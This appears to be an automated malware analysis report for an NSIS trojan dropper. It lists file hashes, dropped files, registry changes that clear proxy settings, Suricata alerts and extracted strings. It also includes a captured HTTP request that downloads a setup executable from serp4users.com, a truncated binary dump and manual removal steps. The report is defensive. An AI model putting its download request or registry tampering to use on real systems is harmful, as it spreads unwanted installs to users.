Trojan.NSIS.StartPage_d7845c64cd
Susp_Dropper (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Requires JavaScript enabled! |
---|
MD5: d7845c64cde6279ac4f1278b24bbe052
SHA1: 99b2bb285021e74f79be76c8e196d33f5735e772
SHA256: 063d63a8fecd598d66b37def1a0a8c68ce92c472c0f6681b7a8e5e1160702986
SSDeep: 3072:h1E/rS2paccKntcsYR/pMgIU6vwVL3VWt9MBt1:h1onxYR/TIULVLlWvMBt1
Size: 100247 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-12-11 23:50:45
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:2060
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:2060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\setup6-141[1].exe (914830 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh76E5.tmp\INetC.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\ssn\Update\setup.exe (971676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh76E4.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh76E5.tmp\nsProcess.dll (12 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh76E3.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh76E5.tmp (0 bytes)
Registry activity
The process %original file name%.exe:2060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\d7845c64cde6279ac4f1278b24bbe052_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\d7845c64cde6279ac4f1278b24bbe052_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\d7845c64cde6279ac4f1278b24bbe052_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\d7845c64cde6279ac4f1278b24bbe052_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\Windows Error Reporting]
"DontShowUI" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\d7845c64cde6279ac4f1278b24bbe052_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\d7845c64cde6279ac4f1278b24bbe052_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
"ProxyOverride"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Save Serp Now"
Dropped PE files
MD5 | File path |
---|---|
92ec4dd8c0ddd8c4305ae1684ab65fb0 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh76E5.tmp\INetC.dll |
faa7f034b38e729a983965c04cc70fc1 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh76E5.tmp\nsProcess.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 24153 | 24576 | 4.45291 | 1892c55874b94ef60ac62cf77f0ecd0e |
.rdata | 28672 | 4678 | 5120 | 3.46601 | 6389f916226544852e494114faf192ad |
.data | 36864 | 108568 | 1024 | 3.61263 | f02c8b5709d3fb8c6cc1ab777c138d8f |
.ndata | 147456 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 188416 | 22024 | 22528 | 2.21731 | 399746be214da9ba8c2804115e8bfd10 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL | IP |
---|---|
hxxp://serp4users.com/setup6-141.exe | ![]() |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /setup6-141.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: serp4users.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.12.1
Date: Thu, 28 Sep 2017 10:19:27 GMT
Content-Type: application/octet-stream
Content-Length: 28966070
Last-Modified: Sat, 09 Sep 2017 16:29:40 GMT
Connection: keep-alive
ETag: "59b416f4-1b9fcb6"
Accept-Ranges: bytesMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........(...F...F.
..F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F...................
......PE..L...5.MX.................`...........2.......p....@.........
..............................@.................................(t....
.......A..............................................................
.............p...............................text...Y^.......`........
.......... ..`.rdata..F....p.......d..............@..@.data...........
.....x..............@....ndata...p...@...........................rsrc.
...A.......B...|..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
.(7B..H.P.u..u..u....r@..B...SV.507B..E.WP.u....r@..e...E..E.P.u....r@
..}..e....\p@........FR..VV..U... M.......M....3.....FQ.....NU..M.....
.....VT.K...{...j..]...j....T...j....K...WV...p@...t.j......9].......V
.VK......|...WV..F..j..x...S........E.PWh....V...p@...t#.E.;.v%8.t!V..
K..;.t...,P.u...G.....E.......9]...Q...h....WW...q@..?...j.......M.QVh
....SPS...q@..............j......PV.ED...U...j1.n......E....V.u..E..bB
..V...@...t.V.sG....h..B.V.fG..P..A..P.vG..V..I.....@..}..|1V.GJ..<<< skipped >>>
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.ndata
.rsrc
Vj%SSS
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
%s%s.dll
sers\"%CurrentUserName%"\AppData\Local\Temp\nsh76E5.tmp\INetC.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh76E5.tmp\INetC.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh76E5.tmp
@.reloc
KERNEL32.DLL
USER32.DLL
COMCTL32.DLL
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpEndRequestA
HttpAddRequestHeadersA
HttpSendRequestA
InternetCrackUrlA
HttpOpenRequestA
HttpSendRequestExA
WININET.DLL
INetC.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
t.UWh
*%S&)
{q|)|%Dx
h.GTG<
nsh76E5.tmp
sers\"%CurrentUserName%"\AppData\Local\Temp\nsh76E5.tmp
\%original file name%.exe
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\ssn
C:\Users\"%CurrentUserName%"\AppData\Roaming\ssn\Update
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsh76E3.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.01</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
1.0.5.2
inetc.dll
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:2060
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\setup6-141[1].exe (914830 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh76E5.tmp\INetC.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\ssn\Update\setup.exe (971676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh76E4.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh76E5.tmp\nsProcess.dll (12 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.